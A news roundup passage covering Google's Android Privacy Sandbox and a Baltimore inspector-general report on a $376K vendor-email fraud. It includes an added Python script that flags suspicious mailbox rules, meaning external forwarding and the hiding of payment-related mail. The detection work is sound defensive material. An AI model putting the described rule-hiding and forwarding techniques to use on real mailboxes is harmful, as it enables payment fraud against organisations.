Google is trying to strike a balance between the financial needs of developers and marketers and the growing demands of privacy-conscious consumers and regulators. The company is gathering feedback on the proposal, much as its web Privacy Sandbox effort is gradually building a new browsing privacy standard. Google's initial web proposal met with scepticism from UK regulators and lawmakers, and the company has since proposed serving ads based on topics a web user is interested in, which are erased and replaced every three weeks.

Meta Platforms Inc., Facebook's parent company, has been at odds with Apple over the company's App Tracking Transparency feature, which lets iPhone users turn off tracking across all of their apps. According to executives, Google's YouTube has taken a minor financial hit from the feature, because it makes it harder for marketers to verify whether their iPhone advertising was effective.

According to Chavez, the Android Privacy Sandbox would enable tailored advertising based on recent "topics" of interest, and enable attribution reporting, which will tell marketers if their ad was effective.

Baltimore City was Duped Out of $376K

A new report from Baltimore's Office of the Inspector General (OIG) reveals that a criminal posing as a vendor duped the city out of hundreds of thousands of dollars last year. In October 2021, the OIG opened an investigation after receiving information from the city's Bureau of Accounting and Payroll Services (BAPS) about an allegedly fraudulent Electronic Funds Transfer (EFT). The Mayor's Office of Children and Family Success (MOCFS) paid the Vendor by EFT.

BAPS and MOCFS were contacted by email on December 22, 2020 and January 7, 2021 from an email address linked to an employee of the Vendor, asking for a change to its EFT remittance details. On December 16, 2020, the email address linked to the Vendor Employee had sent BAPS a Vendor Payment & Electronic Funds Transfer Form.

The OIG later determined that the Vendor Employee's email account had been compromised by a malicious actor who, following a phishing attack, set up mailbox rules inside the account. As a result, the malicious actor was able to correspond with City employees without the Vendor's knowledge.
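The mailbox rules mentioned above are how the attacker keeps the real vendor out of the conversation, and they can be hunted for across a tenant. The Python below is an added example, not from the OIG report: it scores constructed rule records shaped like an Exchange Online Get-InboxRule export (property names follow the cmdlet; the mailbox, rule names, keywords and addresses are invented) and ranks rules that divert or hide payment-related mail.

```python
# Constructed rule records in the shape of an Exchange Online Get-InboxRule export
# (property names follow that cmdlet; mailbox, names and addresses are made up).
RULES = [
    {"Mailbox": "ap@vendor.example", "Name": "Newsletter cleanup", "Enabled": True,
     "SubjectContainsWords": [], "BodyContainsWords": [], "ForwardTo": [], "RedirectTo": [],
     "MoveToFolder": "Archive", "DeleteMessage": False, "MarkAsRead": False},
    {"Mailbox": "ap@vendor.example", "Name": ".", "Enabled": True,
     "SubjectContainsWords": ["EFT", "remittance", "bank", "payment"], "BodyContainsWords": ["account"],
     "ForwardTo": [], "RedirectTo": [],
     "MoveToFolder": "RSS Subscriptions", "DeleteMessage": False, "MarkAsRead": True},
    {"Mailbox": "ap@vendor.example", "Name": "fwd", "Enabled": True,
     "SubjectContainsWords": [], "BodyContainsWords": [],
     "ForwardTo": ["ap.vendor.payments@gmail.com"], "RedirectTo": [],
     "MoveToFolder": None, "DeleteMessage": False, "MarkAsRead": False},
]

INTERNAL_DOMAINS = {"vendor.example"}  # assumption: the organisation's own mail domains
FINANCE_WORDS = {"invoice", "payment", "wire", "bank", "eft", "remittance", "ach",
                 "account", "routing", "swift"}
# Folders a user rarely looks at, so diverted mail goes unnoticed.
HIDE_FOLDERS = {"rss subscriptions", "rss feeds", "archive", "deleted items", "junk email",
                "conversation history"}


def score_rule(rule):
    """Weighted signals of a rule planted to hide a payment conversation from its owner."""
    hits = []  # (weight, reason)
    for addr in rule.get("ForwardTo", []) + rule.get("RedirectTo", []):
        if addr.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS:
            hits.append((2, f"forwards or redirects to external address {addr}"))
    words = {w.lower() for w in rule.get("SubjectContainsWords", []) + rule.get("BodyContainsWords", [])}
    finance = sorted(words & FINANCE_WORDS)
    if finance:
        hits.append((1, "matches finance keywords: " + ", ".join(finance)))
    folder = (rule.get("MoveToFolder") or "").lower()
    hides = bool(rule.get("DeleteMessage")) or folder in HIDE_FOLDERS
    if hides:
        hits.append((1, "hides matched mail (" + (f"moves to {folder}" if folder else "deletes") + ")"))
    if rule.get("MarkAsRead"):
        hits.append((1, "marks matched mail as read"))
    if len(rule.get("Name", "").strip()) <= 2:
        hits.append((1, "near-empty rule name"))
    score = sum(w for w, _ in hits)
    if finance and hides:
        score += 2  # the combination is the classic vendor-email-compromise rule
    return score, [reason for _, reason in hits]


def triage(rules, min_score=2):
    """Enabled rules at or above `min_score`, highest first."""
    out = []
    for rule in rules:
        if not rule.get("Enabled", True):
            continue
        score, reasons = score_rule(rule)
        if score >= min_score:
            out.append((rule["Mailbox"], rule["Name"], score, reasons))
    return sorted(out, key=lambda item: -item[2])


if __name__ == "__main__":
    for mailbox, name, score, reasons in triage(RULES):
        print(f"{mailbox} rule {name!r} score {score}: " + "; ".join(reasons))
```

The rule named "." is the one the OIG's finding describes: any message about EFT, remittance or bank details is moved to a folder nobody reads and marked as read, so the attacker can answer the City's emails before the real employee sees them. The legitimate "Newsletter cleanup" rule also moves mail to Archive but scores too low to surface, which is why the finance-keyword and hide-folder signals are weighted together rather than separately.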

On January 5, 2021, the fraudster contacted MOCFS and BAPS once more, this time requesting that the funds be transferred to a new account at a third financial institution. As verification, the fraudster sent a bank letter and a copy of a voided check bearing the same details as the third account. Believing the fraudster's claims, BAPS paid $376,213.10 into the third account on January 7, 2021.

The OIG found that BAPS employees do not have access to a list of authorized signatories for vendors and must rely on information provided by representatives of City agencies. Furthermore, instead of independently validating the information and requests, BAPS relied on MOCFS to vouch for the request and accepted an incoming phone call from someone claiming to be the Vendor's Chief Financial Officer.

In his response to the report, Director of Finance Henry Raymond told the OIG that new protocols had been implemented requiring Department of Finance (DOF) staff to independently verify bank changes with an executive-level employee. DOF has also devised processes to remove City agencies from vendor accounting procedures.